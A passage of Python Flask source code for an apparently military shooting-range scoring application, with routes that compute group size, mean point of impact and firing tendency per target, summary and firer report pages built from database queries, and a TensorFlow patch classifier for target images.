        j_x = pd.Series(txf).to_json(orient='values')
        j_y = pd.Series(tyf).to_json(orient='values')
        print("this is inside update", txf, file=sys.stderr)
        gp_1 = grouping_length(0, 0, x1, y1)
        up_res_1 = getresulttext(gp_1)
        u_fir_tendency_txt, u_fir_tendency_code = getfiringtendencytext(f_1, txf, tyf)
        session['x1'] = data1['x1']
        session['y1'] = data1['y1']
        session['tf_u_1'] = f_1
        session['gp_u_1'] = gp_1
        session['res_u_1'] = up_res_1
        session['tfirer_x1'] = u_fir_tendency_txt
        session['tfirer_y1'] = u_fir_tendency_code
        session['tfirer_x1_f'] = txf
        session['tfirer_y1_f'] = tyf
    return jsonify(mp=mp_inch,
                   gp_1=gp_1,
                   ten_yu=j_y,
                   ten_xu=j_x,
                   result=up_res_1,
                   u_fir_tendency=u_fir_tendency_txt)
@app.route('/test_2', methods=['GET', 'POST'])
def update_2():
    """Recompute MPI, grouping length and firing tendency for target 2.

    Mirrors update() (target 1): POST body (JSON) carries 'x1'/'y1' shot
    coordinate lists and 'points' for mpi(); results are cached in the
    session and returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext while storing the firing_tendancy result
        # under another name; update() for target 1 passes the computed
        # value, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        # NOTE(review): these keys overwrite target 1's tfirer_x1_f/tfirer_y1_f;
        # probably 'tfirer_x2_f'/'tfirer_y2_f' was intended -- kept as-is,
        # confirm against the templates before changing.
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_3', methods=['GET', 'POST'])
def update_3():
    """Recompute MPI, grouping length and firing tendency (route /test_3).

    Byte-identical copy of update_2 in the original; presumably serves
    target 3, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): all of update_3..update_8 reuse the *_2 session keys
        # (tmpi_2, x2, y2, tf_u_2, ...), clobbering target 2's values --
        # looks like a copy-paste slip, but kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_4', methods=['GET', 'POST'])
def update_4():
    """Recompute MPI, grouping length and firing tendency (route /test_4).

    Byte-identical copy of update_2 in the original; presumably serves
    target 4, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): update_3..update_8 reuse the *_2 session keys,
        # clobbering target 2's values -- kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_5', methods=['GET', 'POST'])
def update_5():
    """Recompute MPI, grouping length and firing tendency (route /test_5).

    Byte-identical copy of update_2 in the original; presumably serves
    target 5, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): update_3..update_8 reuse the *_2 session keys,
        # clobbering target 2's values -- kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_6', methods=['GET', 'POST'])
def update_6():
    """Recompute MPI, grouping length and firing tendency (route /test_6).

    Byte-identical copy of update_2 in the original; presumably serves
    target 6, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): update_3..update_8 reuse the *_2 session keys,
        # clobbering target 2's values -- kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_7', methods=['GET', 'POST'])
def update_7():
    """Recompute MPI, grouping length and firing tendency (route /test_7).

    Byte-identical copy of update_2 in the original; presumably serves
    target 7, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): update_3..update_8 reuse the *_2 session keys,
        # clobbering target 2's values -- kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/test_8', methods=['GET', 'POST'])
def update_8():
    """Recompute MPI, grouping length and firing tendency (route /test_8).

    Byte-identical copy of update_2 in the original; presumably serves
    target 8, yet it still writes the *_2 session keys -- see the NOTE
    below.  POST body (JSON) carries 'x1'/'y1' shot coordinate lists and
    'points' for mpi(); results are returned as JSON for the edit page.
    """
    gp_2 = 0
    j_x_2 = None
    j_y_2 = None
    up_res_2 = None
    mp_inch_2 = []
    u_fir_tendency_txt_2 = None
    if request.method == "POST":
        data1 = request.get_json()
        x2 = [le[0] for le in data1['x1']]
        y2 = [le[0] for le in data1['y1']]
        print("x2", x2, file=sys.stderr)
        points = data1['points']
        # The original computed mpi(1, points) twice; compute once and reuse.
        tmpi_2 = mpi(1, points)
        mp = tmpi_2.tolist()
        mp_inch_2 = [pixeltoinch(mp[0][0]), pixeltoinch(mp[0][1])]
        # NOTE(review): update_3..update_8 reuse the *_2 session keys,
        # clobbering target 2's values -- kept as-is; confirm against the
        # templates before renaming the keys.
        session['tmpi_2'] = mp
        f_2, txf_2, tyf_2 = firing_tendancy(1000, 1000, tmpi_2[0][0], tmpi_2[0][1])
        j_x_2 = pd.Series(txf_2).to_json(orient='values')
        j_y_2 = pd.Series(tyf_2).to_json(orient='values')
        gp_2 = grouping_length(0, 0, x2, y2)
        up_res_2 = getresulttext(gp_2)
        # BUG FIX: the original passed a never-assigned f_2 (always 0) to
        # getfiringtendencytext; update() for target 1 passes the value
        # computed by firing_tendancy, so do the same here.
        u_fir_tendency_txt_2, u_fir_tendency_code_2 = getfiringtendencytext(f_2, txf_2, tyf_2)
        session['x2'] = data1['x1']
        session['y2'] = data1['y1']
        session['tf_u_2'] = f_2
        session['gp_u_2'] = gp_2
        session['res_u_2'] = up_res_2
        session['tfirer_x2'] = u_fir_tendency_txt_2
        session['tfirer_y2'] = u_fir_tendency_code_2
        session['tfirer_x1_f'] = txf_2
        session['tfirer_y1_f'] = tyf_2
    return jsonify(mp=mp_inch_2,
                   gp_1=gp_2,
                   ten_yu=j_y_2,
                   ten_xu=j_x_2,
                   result=up_res_2,
                   u_fir_tendency=u_fir_tendency_txt_2)
@app.route('/detail_summary', methods=['GET', 'POST'])
def detail_summary():
    """Render the per-target summary page for the detail currently firing.

    For each of the 8 targets of the live TShooting row, look up the
    shooter's name and service number plus the Grouping/MPI rows recorded
    today for the current session/detail/spell/paper, and pass them to the
    template as shooter_name_N, shooter_no_N, result_N, gp_N, mpi_x_N,
    mpi_y_N and ten_N (N = 1..8).  Missing values render as empty strings
    via make_empty_string_if_needed.

    NOTE(review): in the original, exactly one of the 48 per-target queries
    (mpi_x for target 3) carried an extra ``MPI.target_no == 3`` filter;
    no other query filtered on target_no, so it is treated as a copy-paste
    slip and dropped here.
    """
    curdate = time.strftime("%Y-%m-%d")
    detail_no = db.session.query(TShooting.detail_no).scalar()
    set_no = db.session.query(TShooting.set_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    paper_ref = db.session.query(TShooting.paper_ref).distinct().scalar()
    target_columns = [
        TShooting.target_1_id, TShooting.target_2_id, TShooting.target_3_id,
        TShooting.target_4_id, TShooting.target_5_id, TShooting.target_6_id,
        TShooting.target_7_id, TShooting.target_8_id,
    ]
    ctx = {}
    for idx, column in enumerate(target_columns, start=1):
        firer_id = db.session.query(column).scalar()
        # Criteria shared by every Grouping / MPI lookup for this target.
        grouping_filter = (
            Grouping.firer_id == firer_id,
            Grouping.date == curdate,
            Grouping.session_id == session_no,
            Grouping.detail_no == detail_no,
            Grouping.spell_no == set_no,
            Grouping.paper_ref == paper_ref,
        )
        mpi_filter = (
            MPI.firer_id == firer_id,
            MPI.date == curdate,
            MPI.session_id == session_no,
            MPI.detail_no == detail_no,
            MPI.spell_no == set_no,
            MPI.paper_ref == paper_ref,
        )
        name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
        service_no = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
        result = db.session.query(Grouping.result).filter(*grouping_filter).scalar()
        gp = db.session.query(Grouping.grouping_length_f).filter(*grouping_filter).scalar()
        mpi_x = db.session.query(MPI.f_mpi_x).filter(*mpi_filter).scalar()
        mpi_y = db.session.query(MPI.f_mpi_y).filter(*mpi_filter).scalar()
        ten = db.session.query(MPI.tendency_text).filter(*mpi_filter).scalar()
        # Same normalisation as the original: numeric fields go through
        # str() first, text fields do not.
        ctx['shooter_name_{}'.format(idx)] = make_empty_string_if_needed(name)
        ctx['shooter_no_{}'.format(idx)] = make_empty_string_if_needed(str(service_no))
        ctx['result_{}'.format(idx)] = make_empty_string_if_needed(result)
        ctx['gp_{}'.format(idx)] = make_empty_string_if_needed(str(gp))
        ctx['mpi_x_{}'.format(idx)] = make_empty_string_if_needed(str(mpi_x))
        ctx['mpi_y_{}'.format(idx)] = make_empty_string_if_needed(str(mpi_y))
        ctx['ten_{}'.format(idx)] = make_empty_string_if_needed(ten)
    return render_template('pages/detail_summary.html', **ctx)
@app.route('/firer_detail_report', methods=['GET', 'POST'])
def firer_detail_report():
    """Show the historical grouping/MPI detail report for one firer.

    GET renders the page with only the service-id drop-down.  POST looks
    up the firer selected in form field 'tag', gathers their identity and
    unit details plus all matching Grouping/MPI detail rows, and re-renders
    the page with the full report.
    """
    # Service ids that populate the selection drop-down.
    firer = [shooter.service_id for shooter in Shooter.query.all()]
    if request.method == 'POST':
        selected = request.form['tag']
        # Identity and unit details of the selected firer.
        firer_id = db.session.query(Shooter.id).filter(Shooter.service_id == selected).scalar()
        firer_name = db.session.query(Shooter.name).filter(Shooter.service_id == selected).scalar()
        firer_brigade = db.session.query(Shooter.brigade).filter(Shooter.service_id == selected).scalar()
        firer_unit = db.session.query(Shooter.unit).filter(Shooter.service_id == selected).scalar()
        rank_id = db.session.query(Shooter.rank_id).filter(Shooter.service_id == selected).scalar()
        rank = db.session.query(Rank.name).filter(Rank.id == rank_id).scalar()
        cant_id = db.session.query(Shooter.cantonment_id).filter(Shooter.service_id == selected).scalar()
        cant_name = db.session.query(Cantonment.cantonment).filter(Cantonment.id == cant_id).scalar()
        div_name = db.session.query(Cantonment.division).filter(Cantonment.id == cant_id).scalar()
        # Every Grouping row for this firer joined with its matching MPI row.
        detail_rows = db.session.query(
            Grouping.date, Grouping.detail_no,
            Grouping.result, Grouping.grouping_length_f, MPI.tendency_text,
        ).filter(
            Grouping.firer_id == firer_id,
            MPI.firer_id == firer_id,
            Grouping.firer_id == MPI.firer_id,
            Grouping.detail_no == MPI.detail_no,
            Grouping.target_no == MPI.target_no,
            Grouping.spell_no == MPI.spell_no,
            Grouping.paper_ref == MPI.paper_ref,
            Grouping.date == MPI.date,
        ).all()
        print(detail_rows, file=sys.stderr)
        return render_template(
            'pages/firer_detail_report.html',
            firer=firer, gp_g=detail_rows, rank=rank, r=selected,
            firer_name=firer_name, firer_brigade=firer_brigade,
            firer_unit=firer_unit, cant_name=cant_name, div_name=div_name,
        )
    return render_template('pages/firer_detail_report.html', firer=firer)
@app.route('/montly_session_summary', methods=['GET', 'POST'])
def montly_session_summary():
    """Render the monthly session summary table.

    POST: for the date picked in the form, build one table row per distinct
    firer of that date — identity columns first, then a (result, grouping
    length) pair for every distinct detail number, with 'N/A' placeholders
    where the firer has no data (see get_a_line_for_box).  Any failure while
    assembling the table renders the monthly-session error page instead.
    """
    form=MonthlyReportForm()
    session_detail=None
    table_box=[]                # one list per firer, rendered as a table row
    distinct_army_num_arr=[]    # distinct service ids that fired on the date
    distinct_detail_num_arr=[]  # distinct detail numbers of the date
    try:
        if request.method == 'POST':
            date=form.start_time.data
            print("date",file=sys.stderr)  # debug trace
            print(date,file=sys.stderr)
            # NOTE(review): detail_no and firer_no are queried but never used below.
            detail_no=db.session.query(Grouping.detail_no).filter(Grouping.date==date).all()
            firer_no=db.session.query(Grouping.firer_id).filter(Grouping.date==date).all()
            # All (service id, name, detail, result, grouping length) rows of the date.
            session_detail=db.session.query(Shooter.service_id,Shooter.name,
                Grouping.detail_no,
                Grouping.result,
                Grouping.grouping_length_f).filter(
                Shooter.id==Grouping.firer_id,
                Grouping.date==date
                ).all()
            distinct_detail_num=db.session.query(Session_Detail.detail_no).filter(
                Session_Detail.date==date ).distinct(Session_Detail.detail_no).all()
            # Flatten the 1-tuples returned by the distinct() queries.
            for e in distinct_detail_num:
                for e4 in e:
                    distinct_detail_num_arr.append(e4)
            distinct_army_num=db.session.query(Shooter.service_id).filter(
                Shooter.id==Grouping.firer_id,
                Session_Detail.date==date,
                Grouping.date==date
                ).distinct(Shooter.service_id).all()
            for e5 in distinct_army_num:
                for e6 in e5:
                    distinct_army_num_arr.append(e6)
            # One row per firer: identity columns, then per-detail result cells.
            for tarmy_no in distinct_army_num_arr:
                box_line = []
                box_line.append(tarmy_no)
                tfirer_name=db.session.query(Shooter.name).filter(Shooter.service_id==tarmy_no).scalar()
                tfirer_brigade=db.session.query(Shooter.brigade).filter(Shooter.service_id==tarmy_no).scalar()
                tfirer_unit=db.session.query(Shooter.unit).filter(Shooter.service_id==tarmy_no).scalar()
                cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==tarmy_no).scalar()
                cantonment=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
                div=db.session.query(Cantonment.division).filter(Cantonment.id==cant_id).scalar()
                rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==tarmy_no).scalar()
                tfirer_rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
                print(tfirer_rank,file=sys.stderr)  # debug trace
                box_line.append(tfirer_name)
                box_line.append(tfirer_rank)
                box_line.append(cantonment)
                box_line.append(div)
                box_line.append(tfirer_brigade)
                box_line.append(tfirer_unit)
                for tdetail_no in distinct_detail_num_arr:
                    tdetail_data = get_a_line_for_box(session_detail, tarmy_no, tdetail_no)
                    for te in tdetail_data:
                        box_line.append(te)
                table_box.append(box_line)
            print("---------")
            print(table_box)
    except Exception as e:
        # Broad catch: any failure while building the table shows the error page.
        return render_template('errors/monthly_session_error.html')
    return render_template('pages/monthly_session_summary.html',form=form,detail_no_f=distinct_detail_num_arr,box =table_box )
@app.route('/session_summary', methods=['GET', 'POST'])
def session_summary():
    """Render the per-session summary table.

    GET: show the page with the list of known session numbers.
    POST: for the session picked in ``comp_select4``, build one table row
    per distinct firer of that session — identity columns first, then a
    (result, grouping length) pair per distinct detail number, with 'N/A'
    placeholders where the firer has no data (see get_a_line_for_box).
    """
    curdate=time.strftime("%Y-%m-%d")  # NOTE(review): not used below
    s_no=db.session.query(Shooting_Session.session_no).all()
    session_detail=None
    table_box=[]                # one list per firer, rendered as a table row
    s_arr=[]                    # flattened session numbers for the selector
    distinct_army_num_arr=[]    # distinct service ids of the session
    distinct_detail_num_arr=[]  # distinct detail numbers of the session
    # Flatten the 1-tuples returned by the session-number query.
    for ele in s_no:
        for ele2 in ele:
            s_arr.append(ele2)
    if request.method == 'POST':
        no = request.form.get('comp_select4')
        # NOTE(review): detail_no and firer_no are queried but never used below.
        detail_no=db.session.query(Session_Detail.detail_no).filter(Session_Detail.session_id==no).all()
        firer_no=db.session.query(Grouping.firer_id).filter(Grouping.session_id==no).all()
        # All (service id, name, detail, result, grouping length) rows of the session.
        session_detail=db.session.query(Shooter.service_id,
            Shooter.name,
            Grouping.detail_no,
            Grouping.result,
            Grouping.grouping_length_f).filter(
            Shooter.id==Grouping.firer_id,
            Grouping.session_id==no
            ).all()
        distinct_detail_num=db.session.query(Session_Detail.detail_no).filter(
            Session_Detail.session_id==no ).distinct(Session_Detail.detail_no).all()
        for e in distinct_detail_num:
            for e4 in e:
                distinct_detail_num_arr.append(e4)
        distinct_army_num=db.session.query(Shooter.service_id).filter(
            Shooter.id==Grouping.firer_id,
            Session_Detail.session_id==no,
            Grouping.session_id==no
            ).distinct(Shooter.service_id).all()
        for e5 in distinct_army_num:
            for e6 in e5:
                distinct_army_num_arr.append(e6)
        # One row per firer: identity columns, then per-detail result cells.
        for tarmy_no in distinct_army_num_arr:
            box_line = []
            box_line.append(tarmy_no)
            tfirer_name=db.session.query(Shooter.name).filter(Shooter.service_id==tarmy_no).scalar()
            tfirer_brigade=db.session.query(Shooter.brigade).filter(Shooter.service_id==tarmy_no).scalar()
            tfirer_unit=db.session.query(Shooter.unit).filter(Shooter.service_id==tarmy_no).scalar()
            cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.service_id==tarmy_no).scalar()
            cantonment=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
            div=db.session.query(Cantonment.division).filter(Cantonment.id==cant_id).scalar()
            rank_id=db.session.query(Shooter.rank_id).filter(Shooter.service_id==tarmy_no).scalar()
            tfirer_rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
            print(tfirer_rank)  # debug trace
            box_line.append(tfirer_name)
            box_line.append(tfirer_rank)
            box_line.append(cantonment)
            box_line.append(div)
            box_line.append(tfirer_brigade)
            box_line.append(tfirer_unit)
            for tdetail_no in distinct_detail_num_arr:
                tdetail_data = get_a_line_for_box(session_detail, tarmy_no, tdetail_no)
                for te in tdetail_data:
                    box_line.append(te)
            table_box.append(box_line)
        print("---------")
        print(table_box)
        print(distinct_detail_num_arr)
    return render_template('pages/session_summary.html',session=s_arr,detail_no_f=distinct_detail_num_arr,box =table_box )
def get_a_line_for_box(qresult, army_no, detail_no):
    """Extract the (result, grouping length) cells for one firer and one detail.

    Args:
        qresult: rows shaped (service_id, name, detail_no, result, grouping_length).
        army_no: service id of the firer whose cells are wanted.
        detail_no: detail number to match.

    Returns:
        list: result and grouping length for every matching row, or
        ['N/A', 'N/A'] when the firer has no row for that detail.
    """
    new_line = []
    for row in qresult:
        # row layout: (service_id, name, detail_no, result, grouping_length);
        # name and detail are only used for matching, not emitted.
        if row[2] == detail_no and row[0] == army_no:
            new_line.append(row[3])
            new_line.append(row[4])
    if not new_line:
        # Keep the table cells aligned when the firer skipped this detail.
        new_line = ['N/A', 'N/A']
    return new_line
def predictAsMatrix(image, width, height):
    """Slide a 25x25 window over *image* and classify every patch.

    Each patch is converted to grayscale, flattened, and classified by the
    restored TF model; the 0/1 predictions are collected into a matrix.

    Returns:
        np.ndarray of shape (width//25, height//25), one prediction per patch.
    """
    step = 25
    resized_array = np.zeros(shape=(width // step, height // step))
    # NOTE(review): both sweep bounds use `height`; for non-square images the
    # i-sweep (the crop's x axis) looks like it should stop at width-25 —
    # confirm with callers before changing.
    for i in range(0, height - step + 1, step):
        for j in range(0, height - step + 1, step):
            patch = image.crop((i, j, i + step, j + step))
            gray = color.rgb2gray(np.array(patch))
            dataset = merge_datasets(gray)
            flattened = reformat(dataset)
            resized_array[j // step][i // step] = patchIdentification(flattened)
    return resized_array
def make_empty_string_if_needed(v):
    """Normalize sentinel values ("999", "NA", "None", or None) to the empty string."""
    if v is None or v in ("999", "NA", "None"):
        return ""
    return v
def merge_datasets(img1):
    """Wrap a single 25x25 grayscale patch into a one-image prediction dataset."""
    dataset = make_arrays(1, 25, 25)
    dataset[0:1, :, :] = img1
    return dataset
def make_arrays(nb_rows, image_height, image_width):
    """Allocate an uninitialized float32 image dataset, or None when nb_rows is falsy."""
    if not nb_rows:
        return None
    return np.ndarray((nb_rows, image_height, image_width), dtype=np.float32)
def reformat(dataset):
    """Flatten each 25x25 patch into a 625-element float32 row vector."""
    return dataset.reshape((-1, 25 * 25)).astype(np.float32)
def patchIdentification(data):
    """Run the restored TF graph on one flattened patch and return its class.

    Uses the module-level ``graph`` and ``sess`` set up by load_model.
    Returns 0 when the first score dominates, otherwise 1.
    """
    input_tensor = graph.get_tensor_by_name("tf_test_image:0")
    output_tensor = graph.get_tensor_by_name("test_prediction_image:0")
    prediction = sess.run([output_tensor], feed_dict={input_tensor: data})
    scores = prediction[0][0]
    return 0 if scores[0] > scores[1] else 1
class Graph:
    """Count the 8-connected components ("islands") of 1-cells in a binary grid.

